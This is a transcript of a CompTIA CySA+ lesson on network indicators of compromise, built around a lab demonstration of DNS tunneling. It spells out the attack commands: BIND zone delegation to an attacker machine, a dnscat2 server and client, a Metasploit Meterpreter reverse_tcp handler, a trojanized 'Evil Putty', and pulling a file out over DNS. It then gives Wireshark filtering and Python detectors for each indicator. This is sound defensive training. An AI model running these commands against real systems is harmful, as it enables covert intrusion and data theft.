CompTIA CYSA+ CS0-002 – Analyzing Network IOCs Part 6

  1. Analysis of Network IOCs (OBJ 4.3)

Analysis of network IOCs. In this lesson we’re going to talk about analyzing network-related indicators of compromise. Network activity is one of the best sources of indicators when we’re trying to analyze a suspected incident. What I’m going to do in this lesson is set up a simple DNS tunneling mechanism. This will help illustrate how attackers can disguise their communications by using a covert channel such as DNS, hiding information inside that very common protocol. To do this, I’m going to go into my lab environment and set up the attack. Now, performing this attack is really something that’s more focused on the PenTest+ side.

But I’m going to show you how I do this because it’s important for us to be able to see it, so that as defenders we know what the attacker is doing. Then I’m going to show you how you can identify this as a defender. Now, when I set up my DNS tunneling, I need to act as an authoritative name server. That way queries for name records are going to be directed to my machine as the attacker instead of to some trusted domain server. There are lots of techniques for doing this. For instance, we’ve talked about DGAs, domain generation algorithms, which rapidly cycle through different domain names; a related but distinct technique is fast-flux DNS, where the records for a single domain are rapidly changed to point at different IP addresses. My approach here is going to be to compromise the records on another name server.

Now this name server is going to be hosted on a LAMP server, which stands for Linux, Apache, MySQL and PHP, and it’s running BIND. I’m going to attack this LAMP server and create a delegation for a subdomain. Because this isn’t really a course on learning how to attack things, I’m going to simplify and assume I’ve obtained the administrative credentials somehow. Maybe I had a wireless sniffer and was able to capture them. Whatever it is, I’m going to log in as the admin so I can do this setup. At the command prompt, I change into the /etc/bind directory. Once I’m there, I run sudo mv named.conf.local.bak named.conf.local, which renames my backup file into the new local configuration file.

That backup file is one I’ve already configured with the things I need to run this attack. Next I need to change the BIND options. I run sudo nano named.conf.options, which is the file that holds the server’s global options (the zone records themselves live in a separate file). I go down and add the following two lines: dnssec-validation no; and allow-recursion { any; };. The first turns off DNSSEC validation, so my unsigned lab delegation can’t be rejected on DNSSEC grounds, and the second makes the server answer recursive queries from any client, which is what lets a victim that points at this server have its lookups under my subdomain followed through to my own name server. Then I hit Ctrl+O and Enter to save the file, and Ctrl+X to close it.

Now that I’ve done that, I need to open the zone file and modify the DNS records. So I run sudo nano db.515web.net. Into this file I add the delegation records for my own subdomain, which I’m calling pwn. The lines are $ORIGIN pwn.515web.net., then @ IN NS ns1.pwn.515web.net., which says the name server for this subdomain is ns1.pwn.515web.net, and then ns1 IN A 192.168.2.192, which gives that name server an A record pointing at my attacker machine. Then I save with Ctrl+O and Enter, and close the file with Ctrl+X.

Next I want to restart BIND. To do this, I type sudo service bind9 restart and hit Enter. All right, so now the delegation pointing at my attacker’s machine is in place. What does my lab actually look like, you might wonder? Well, here’s what it looks like. Notice the LAMP server in the bottom left at 192.168.1.1. That’s the Linux, Apache, MySQL and PHP server whose records I just compromised, and it is the authoritative source for all 515web.net DNS. Its records now say that the name server for pwn.515web.net is located at 192.168.2.192, which is the Kali Linux machine I’m running these attacks from. So now any time somebody looks up a name under pwn.515web.net, the query is sent on to that Kali Linux machine instead of being answered by the LAMP server.

But that Kali Linux server doesn’t have a listener yet, so let’s go ahead and set that up. We need a server listening for DNS queries, so that any time somebody looks up a record under pwn.515web.net, it’s there to answer. The tool we’re going to use is dnscat2, which tunnels data over DNS. On my attacker workstation I open a terminal and type service apache2 start, which starts my web service. Then I change into the Downloads/dnscat2/server directory, and from there I use Ruby to run the dnscat2.rb script with the domain I want to use: ruby dnscat2.rb pwn.515web.net.

At this point we need to get the client onto the victim machine, and we’re going to use Evil Putty to do that. So I open a new terminal window and type msfconsole, which starts the Metasploit Framework, an exploitation tool we can use as penetration testers and red teamers. In Metasploit I type use exploit/multi/handler, which selects the generic handler for incoming connections. Then I set my payload by typing set payload windows/meterpreter/reverse_tcp, and then I set the local host, which is the address that’s going to listen for the callback: set LHOST 192.168.2.192, the IP of my Kali Linux machine.

And then I set the port I want to listen on: set LPORT 3389, which is the port normally used by RDP, the Remote Desktop Protocol. This is how you configure a handler; these four lines are just the configuration that lets it run. To start it, I type exploit and hit Enter, and that brings the listener up. All right, so now we want to see what this attack looks like on the wire. I’ve set up the listener and the DNS rerouting, so let’s trigger the attack. I log in to my analyst machine and start Wireshark, capturing on the Ethernet interface with a capture filter that excludes my own analyst host and keeps only traffic on port 3389 or port 53: not host <analyst IP> and (port 3389 or port 53).

So what am I looking for here? Basically any host that is communicating on port 3389, the RDP port I just set my listener on, or on port 53, which is DNS. Now I open a browser and go to http://192.168.2.192. Why? Because that’s where Evil Putty is served from, and I can click through any warnings and run it. Now let me go back to my attacker machine. Once Evil Putty has run, we have a Meterpreter session on the listener I just set up. From that session on my penetration testing machine I run upload /root/Downloads/dnscat2.exe C:\\labfiles, which puts the dnscat2 client into C:\labfiles on the victim.

Now I type shell, and then cd C:\labfiles. This means I have a command shell on the victim and I’m in that directory, so I can run the dnscat2 client: dnscat2.exe --dns domain=pwn.515web.net,server=192.168.1.1. Now, what did I just do? I started the dnscat2 client on the victim machine, pointed at the LAMP server (192.168.1.1) as its DNS server and at pwn.515web.net as the tunnel domain. That server follows the delegation I planted and forwards the queries to my Kali Linux machine, so data now flows over DNS back to the attacker. Let’s go back over and look at the dnscat2 server, and you’ll notice a new session window has been created.

This session is encrypted, and we have good communication between the victim, in this case the Windows machine Bobby PC that I logged into before, and the Linux machine I’m using as the attacker. Now let’s look back at Meterpreter. Here I hit Ctrl+Z and answer yes to the prompt, which backgrounds the session; I don’t need that listener anymore, because I already have a tunnel between my system and the victim. Then I quit Metasploit by typing exit, and exit again. Now let’s switch to the terminal that’s hosting the dnscat2 server. From here I’ll run a couple of commands to navigate the victim’s system. First, I type window -i 1 and hit Enter.

Then I type shell and hit Enter. Then I type window -i 2 and hit Enter, and then dir and hit Enter. Now, what did I do here? dnscat2 organizes each session into a window. window -i 1 attaches me to the command session for the victim, and shell asks the victim to start a new command-shell session, which shows up as window 2. Attaching to window 2 and running dir gives me a directory listing on that Windows system. Now let’s say the gpo.zip file in that listing is of interest and I want to grab it. I can use this DNS tunnel to download it. I exit the shell session by typing exit and hitting Enter, and then window -i 1 again takes me back to the command session.

Then I run download gpo.zip /root/Downloads/gpo.zip, giving the remote file name and where I want to save it locally. When I had that shell, I could run any command I wanted; now that I’ve exited it, I’m issuing dnscat2’s own commands to that Windows machine. The download should only take a couple of seconds, and now I have the file. So let’s go in and look at the indicators of compromise by analyzing our attack. First we go back to our analyst machine, PC One. There I stop the Wireshark capture and scroll to the start of the output. You can observe that the Meterpreter session was established over port 3389, which is the well-known port for Microsoft’s Remote Desktop Protocol service.

And so you should be used to seeing RDP traffic on a normal network, which is why this may not look abnormal at first. But the data transferred here is Meterpreter’s own framing carried in raw TCP, not RDP: a genuine RDP session opens with a TPKT header and an X.224 connection request, and this stream never does, so the port number and the protocol on it don’t match. As we look toward the end of the capture, we start seeing the DNS tunneling traffic. There are lots of different records being used here, and the reason is that we’re tunneling information through these DNS requests. If there’s a firewall in the way, this goes right through it, because DNS is usually allowed to exit the network over port 53 so hosts can resolve the names of the websites they want to go to.
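The port/protocol mismatch described above is something you can check mechanically rather than by eye. The following is an added example, not part of the lesson and not code from Metasploit or any other tool it uses: it builds a minimal RDP Client X.224 Connection Request the way a real client sends it, and checks whether the first bytes of a TCP/3389 conversation parse as one. The sample flows, the addresses in them and the non-RDP byte string standing in for a Meterpreter stream are constructed for the example.

```python
# Added example, not from the lesson: does the first payload on TCP/3389 look like RDP?
# A Meterpreter reverse_tcp session parked on 3389 uses its own framing, so the port
# number says "RDP" while the bytes do not. Real RDP opens with a TPKT header and an
# X.224 Connection Request (MS-RDPBCGR section 2.2.1.1).
import struct
from typing import List, Optional, Tuple


def build_x224_connection_request(cookie: Optional[str] = None) -> bytes:
    """Build the Client X.224 Connection Request PDU a real RDP client sends first."""
    body = b""
    if cookie:                                   # mstsc sends "Cookie: mstshash=<user>\r\n"
        body += b"Cookie: mstshash=" + cookie.encode() + b"\r\n"
    # rdpNegReq: type TYPE_RDP_NEG_REQ (1), flags 0, length 8, requestedProtocols SSL|HYBRID
    body += struct.pack("<BBHI", 0x01, 0x00, 8, 0x00000003)
    # X.224 CR TPDU: code 0xE0 (CR, CDT=0), DST-REF 0, SRC-REF 0, CLASS 0, then the body
    tpdu = struct.pack("!BHHB", 0xE0, 0, 0, 0) + body
    tpdu = bytes([len(tpdu)]) + tpdu             # LI = length of the TPDU after the LI octet
    # TPKT header: version 3, reserved 0, total length including the 4-byte header
    return struct.pack("!BBH", 3, 0, 4 + len(tpdu)) + tpdu


def looks_like_rdp_connection_request(payload: bytes) -> bool:
    """True if the bytes parse as TPKT + X.224 Connection Request."""
    if len(payload) < 11:                        # 4 TPKT + 7 X.224 header bytes minimum
        return False
    version, reserved, tpkt_len = struct.unpack("!BBH", payload[:4])
    if version != 3 or reserved != 0 or tpkt_len != len(payload):
        return False
    li, code, dst_ref = struct.unpack("!BBH", payload[4:8])
    if (code & 0xF0) != 0xE0 or dst_ref != 0:    # must be a Connection Request with DST-REF 0
        return False
    return 4 + 1 + li == tpkt_len                # LI must account for the rest of the TPKT


# (client, server, dport, first application-layer bytes seen on the flow)
Flow = Tuple[str, str, int, bytes]


def flag_port_protocol_mismatches(flows: List[Flow]) -> List[str]:
    """Return one alert per flow to port 3389 whose first bytes are not an RDP handshake."""
    alerts = []
    for client, server, dport, first_bytes in flows:
        if dport == 3389 and not looks_like_rdp_connection_request(first_bytes):
            alerts.append(f"{client} -> {server}:3389 is not RDP; first bytes {first_bytes[:8].hex()}")
    return alerts


def build_sample_flows() -> List[Flow]:
    """Constructed sample, not a capture: one genuine RDP handshake, one flow to the
    attacker's 3389 listener whose bytes are a made-up non-RDP stream (a stand-in for
    Meterpreter framing, not a real stager), and one unrelated TLS flow on 443."""
    return [
        ("10.1.0.50", "10.1.0.10", 3389, build_x224_connection_request("alice")),
        ("192.168.1.57", "192.168.2.192", 3389, b"\x00\x2a\x0c\x00MZ\x90\x00\x03\x00\x00\x00\x04"),
        ("10.1.0.50", "10.1.0.10", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),
    ]


if __name__ == "__main__":
    for line in flag_port_protocol_mismatches(build_sample_flows()):
        print(line)
```

In practice you would feed this the first client bytes of each 3389 flow (Zeek’s conn and rdp logs, or a tshark export of the first data segment per stream). The check is deliberately strict: a stream that never presents a TPKT/X.224 connection request on 3389 is not RDP, whatever the port suggests.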

And so that’s why attackers like to use this DNS tunneling technique. The way we can recognize it as an indicator of compromise is the pattern of all those records: a single client sending a large number of queries for unique, long, random-looking subdomains of one domain (here pwn.515web.net), many of them for record types such as TXT, CNAME and MX that an ordinary client rarely asks for. If we look inside the individual records, the data isn’t what a normal DNS record carries; it’s data we’re packing in to tunnel through the protocol. Note that each packet is still a syntactically valid DNS message, which is exactly why it passes the firewall. So an intrusion detection system catches this not because the messages are malformed but because of those anomalies in query volume, name length, entropy and record type, which is how the exfiltration out of the network gets flagged.
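The record pattern described above can be scored from a DNS query log. This is an added example, not code from the lesson or from dnscat2: it takes (client, query name, record type) tuples, the fields you would export from Wireshark or read from a Zeek dns.log, scores each name with a few tunnelling heuristics (overall length, label length, Shannon entropy of the subdomain part, data-bearing record types), then groups queries by client and registrable domain so that a burst of unique, high-scoring names for one domain is reported. The query list, the client addresses and the hex labels (SHA-256 digests standing in for dnscat2’s hex-encoded data) are constructed for the example; the thresholds are starting points to tune against your own baseline.

```python
# Added example, not from the lesson: score DNS queries for tunnelling indicators.
# Each packet dnscat2 sends is a well-formed DNS query; what gives it away is the
# pattern: many unique, long, high-entropy subdomains of one domain, often asked
# for as TXT/CNAME/MX, all from one client.
import hashlib
import math
from collections import Counter, defaultdict

DATA_QTYPES = {"TXT", "CNAME", "MX", "NULL"}   # record types tunnels use to carry bytes back


def shannon_entropy(text: str) -> float:
    """Bits per character; hex-encoded data sits near 4.0, hostnames usually well below 3."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str):
    """Return (registrable domain, subdomain labels). Two-label approximation: fine for the
    lab's 515web.net, a production tool should use the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_query(qname: str, qtype: str):
    """Score one query: how many tunnelling heuristics fired, and which."""
    _, sub = split_name(qname)
    subtext = "".join(sub)
    reasons = []
    if len(qname) > 50:
        reasons.append("long qname")
    if any(len(label) >= 30 for label in sub):
        reasons.append("long label")
    if len(subtext) >= 20 and shannon_entropy(subtext) > 3.5:
        reasons.append("high-entropy subdomain")
    if qtype in DATA_QTYPES and sub:            # MX for the apex is normal; MX for a random host is not
        reasons.append(f"data-bearing qtype {qtype}")
    return len(reasons), reasons


def find_tunnels(queries, min_queries: int = 5):
    """queries: iterable of (client, qname, qtype). Returns {(client, domain): summary}
    for client/domain pairs that look like a tunnel rather than ordinary resolution."""
    buckets = defaultdict(list)
    for client, qname, qtype in queries:
        domain, _ = split_name(qname)
        buckets[(client, domain)].append((qname, qtype))
    alerts = {}
    for key, items in buckets.items():
        if len(items) < min_queries:
            continue
        scores = [score_query(q, t)[0] for q, t in items]
        unique_ratio = len({q for q, _ in items}) / len(items)   # tunnels never repeat a name (caching)
        mean_score = sum(scores) / len(scores)
        if mean_score >= 2 and unique_ratio >= 0.8:
            alerts[key] = {"queries": len(items), "unique_ratio": unique_ratio, "mean_score": mean_score}
    return alerts


def build_sample_queries():
    """Constructed sample, not a capture: ordinary lookups from a workstation at 10.1.0.20,
    plus a dnscat2-style stream from an assumed victim address 192.168.1.57 to pwn.515web.net.
    SHA-256 hex digests stand in for the hex-encoded session data in the labels."""
    benign = [
        ("10.1.0.20", "www.515web.net", "A"),
        ("10.1.0.20", "515web.net", "MX"),
        ("10.1.0.20", "www.515web.net", "A"),
        ("10.1.0.20", "cdn.example.com", "A"),
        ("10.1.0.20", "time.windows.com", "A"),
        ("10.1.0.20", "wpad.corp.local", "A"),
    ]
    tunnel = []
    for i in range(8):
        data = hashlib.sha256(f"chunk{i}".encode()).hexdigest()        # 64 hex chars
        qname = f"{data[:32]}.{data[32:]}.pwn.515web.net"               # labels stay under 63 chars
        tunnel.append(("192.168.1.57", qname, ("TXT", "CNAME", "MX")[i % 3]))
    return benign + tunnel


if __name__ == "__main__":
    for (client, domain), summary in find_tunnels(build_sample_queries()).items():
        print(f"{client} -> {domain}: {summary}")
```

Grouping by registrable domain rather than by full name is what makes this work: every tunnel query name is different, but they all share pwn.515web.net, and a single workstation asking for hundreds of unique hosts under one domain in a few seconds has no benign explanation.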

All right, I hope you enjoyed this lesson and seeing just one of the many attacks people can use against your networks. Remember, as a cybersecurity analyst it’s your job to understand what these attacks look like in Wireshark and packet captures, because that is one of the main things you’ll be looking at while working on a SOC watch floor. In addition, you’ll be looking at SIEMs and intrusion detection systems; those have specific alerts that flag this type of activity, and then you can go into more depth by pulling up the packet captures.
